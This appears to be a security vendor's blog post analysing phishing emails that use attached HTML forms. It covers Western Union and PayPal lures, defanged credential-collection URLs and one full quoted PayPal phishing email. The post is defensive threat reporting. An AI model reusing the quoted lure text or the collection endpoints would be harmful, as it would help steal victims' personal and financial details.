Phishing emails with attached HTML forms instead of embedded URLs

MX Lab noticed an increase of phishing emails with an attached HTML form instead of the embedded URLs that directs a user to an online form.

Phishing emails with an embedded URL are subject to certain filters or so called intent analysis techniques. The email can be blocked succesfully when the URL is know as a phishing site.

Phishers will try to avoid these techniques by sending an HTML page as attachment with the email. The provided instructions in the email will make sure that the receiver knows how to handle the phishing attempt. You will get an form to fill in some details once the attached web page is opened in a browser. The data is submitted to an online web site that will handle the request and redirects you further.

Western Union phishing

The phishing email is sent from the spoofed address Western Union customer-support@westernunion.com with the subject “Notice from WesternUnion© : Access to sensitive part of your online account has been suspended(CODE:RX41819S1)”.

The attached file has the name restore.account.html and when opened in a browser you will have a webform that asks for your personal details.

When investigating the HTML code we can see that the CSS, Javascript and images are requested from the official web site of Western Union. The post action of the web form will submit the details to hxxp://elainegohl.biz/restore.php.

PayPal phishing

The message comes from account@ paypall.com – notice the use of a domain with a ‘typo error’ – and this one includes the instructions of opening the attached file to restore access to the account.

The attached file Restore Account.html contains a form that will send the submitted details to hxxp://pisyneluta.com/u.php.

Another PayPal phishing example

Dear PayPal customer,

During our regularly scheduled account maintenance and
verification procedure we have detected a slight error in your
billing information.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)
2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please verify your information. To do this we have attached a
form to this email. Please download the form and follow the
instructions on your screen.
NOTE: The form needs to be opened in a modern browser which has
javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3,
Opera 9)

We are requesting this information to verify and protect your
identity. This is in order to prevent the illegal activity of
PayPal accounts.

Please do not reply to this email.

We apologize for any inconvenience this may have
caused. Sincerely, PayPal Security Team.

PayPal Email ID PP836l Email ID PP836

The HTML included with the PayPal phish rendered incorrectly in when opened in a browser. Also, the document was named “Profile Update – PayPal.mth” – notice the .mht type insted of .htm.